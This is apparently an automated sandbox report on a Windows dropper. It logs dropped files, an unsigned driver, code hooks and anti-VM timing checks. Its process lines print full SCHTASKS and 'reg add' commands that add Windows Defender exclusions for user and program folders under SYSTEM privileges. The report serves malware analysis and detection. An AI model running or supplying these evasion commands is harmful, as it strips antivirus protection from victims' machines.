Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: pid.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: vselog.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe

File written: C:\Users\Public\Music\destopbak.ini

Jump to behavior

Source: 13478674376-78423498.01.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 13478674376-78423498.01.exe

Static file information: File size 31171152 > 1048576

Source: 13478674376-78423498.01.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 13478674376-78423498.01.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 13478674376-78423498.01.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 13478674376-78423498.01.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 13478674376-78423498.01.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 13478674376-78423498.01.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 13478674376-78423498.01.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d3dx9_43.pdb source: 13478674376-78423498.01.exe
Source:	Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 13478674376-78423498.01.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CE2000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, FLgX3z.exe.6.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000005.00000000.3165690045.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 4mPVjj.exe, 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 4mPVjj.exe, 00000006.00000000.3185438995.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 4mPVjj.exe, 00000006.00000002.3378035799.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 4mPVjj.exe.0.dr

Source: 13478674376-78423498.01.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 13478674376-78423498.01.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 13478674376-78423498.01.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 13478674376-78423498.01.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 13478674376-78423498.01.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_000000014000F000

Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 6_2_02A2C2B4 push rbp; ret		6_2_02A2C2BA
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 6_2_0298D2DD push qword ptr [rsp+rsi*2-644654D0h]; ret		6_2_0298D337

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	File created: C:\Users\user\Documents\4mPVjj.exe			Jump to dropped file
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	File created: C:\Users\user\Documents\vselog.dll			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	File created: C:\Windows\System32\drivers\189atohci.sys	Jump to dropped file
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	File created: C:\Users\user\Documents\4mPVjj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	File created: C:\Users\user\Documents\vselog.dll	Jump to dropped file
Source: C:\Users\user\Documents\4mPVjj.exe	File created: C:\Program Files (x86)\9eAesx\FLgX3z.exe	Jump to dropped file

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"

Source: C:\Users\user\Documents\4mPVjj.exe

5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\4mPVjj.exe	Memory written: PID: 4328 base: 7FFDB4590008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Memory written: PID: 4328 base: 7FFDB442D9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Memory written: PID: 1524 base: 7FFDB4590008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Memory written: PID: 1524 base: 7FFDB442D9F0 value: E9 20 26 16 00	Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\4mPVjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	RDTSC instruction interceptor: First address: 140001157 second address: 14000116E instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\13478674376-78423498.01.exe	RDTSC instruction interceptor: First address: 14000116E second address: 14000116E instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F6504D352B0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\4mPVjj.exe	RDTSC instruction interceptor: First address: 603EE5 second address: 603EF3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Documents\4mPVjj.exe

